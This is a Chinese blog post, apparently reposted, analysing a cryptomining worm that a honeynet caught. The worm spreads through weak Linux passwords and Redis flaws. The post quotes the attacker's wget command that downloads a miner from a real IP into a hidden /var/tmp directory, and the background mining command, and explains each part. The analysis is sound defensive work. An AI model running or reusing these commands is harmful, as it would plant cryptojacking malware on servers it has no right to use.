分享

更多

   

蠕虫挖矿一例,无码

2017-03-06  黑马_御风




今天凌晨,我们的蜜网系统跳出了个有趣的字符串:


zaxa2aq@protonmail.com


ProtonMail!前段时间我们的分享(推荐安全且匿名的邮箱 ProtonMail)似乎暗示着某种巧合,这不得不引起我们的兴趣。意料之内,匿名是把双刃剑,剑的另一端,“匿名之恶”会让人性丑恶发挥到极致。


以前我说过,黑暗森林法则同样适用于这个网络空间:被发现即被干掉。不好意思,这次是我们“干掉”了对方。


上面这个字符串完整内容是:


(exec /var/tmp/.war/1 -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u zaxa2aq@protonmail.com -p x &> /dev/null &)


我简单解释下这条 Bash 命令:


1.

exec,负责执行后面的命令,细节用途自行查阅。


2.

/var/tmp/.war/1,这个文件由下面这条命令创建:

wget http://95.128.182.166/javascripts/minerd -O /var/tmp/.war/1


3.

1 == minerd


4.

minerd 之后的参数:

-a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u zaxa2aq@protonmail.com -p x

目测和比特币等这类货币的挖矿有关,因为:minergate.com 就是这样的邪恶挖矿大平台。合法存在。


5.

&> /dev/null

无视标准输出与错误输出。


6.

最后的 &,表示这条命令放到后台执行。


7.

最外层的小括号(),表示创建一个新的 Shell。


上面的7点解释,重点看第4点就好。


为了确定我们的“目测”,我们用我们唯一的官方邮箱“lant34m@protonmail.com”同样在 minergate.com 上注册了个账号。在这个平台深度体验一番,不得不感慨,挖矿的世界真是眼花缭乱,满地宝藏既视感。


这个平台上,我们发现下面这个挖矿说明链接:


https://minergate.com/altminers/cpuminer-multi-wolf


部分区域截图如下:



红框里的内容是:


minerd -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u lant34m@protonmail.com -p x


对比下上面的第4点,这下确定了吧?另外,这个 minerd 本身还是开源的...你可以根据自己的特殊要求修改编译。


好,回到开头,这个蠕虫其实不是什么新鲜玩意,传播的主要方式是通过 Linux 服务器的弱口令及一些漏洞(比如:Redis 那个未授权访问缺陷)。


这个蠕虫感染一万台服务器,那么就有一万个挖矿节点...


别说运用什么 0day,就是用到一些上古时代的技术,我们也能在这个健壮又脆弱的网络空间里成为“有钱人”。


还好,我们不是坏人。




这个案例够清晰吧?还想看到更多的吗?经过“懒人在思考”的白话润色,保证你即使不懂技术,也能涨姿势。


网络空间,这个巨型大脑,真美...


-----------------

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。如发现有害或侵权内容,请点击这里 或 拨打24小时举报电话:4000070609 与我们联系。

    猜你喜欢

    0条评论

    发表

    类似文章 更多
    喜欢该文的人也喜欢 更多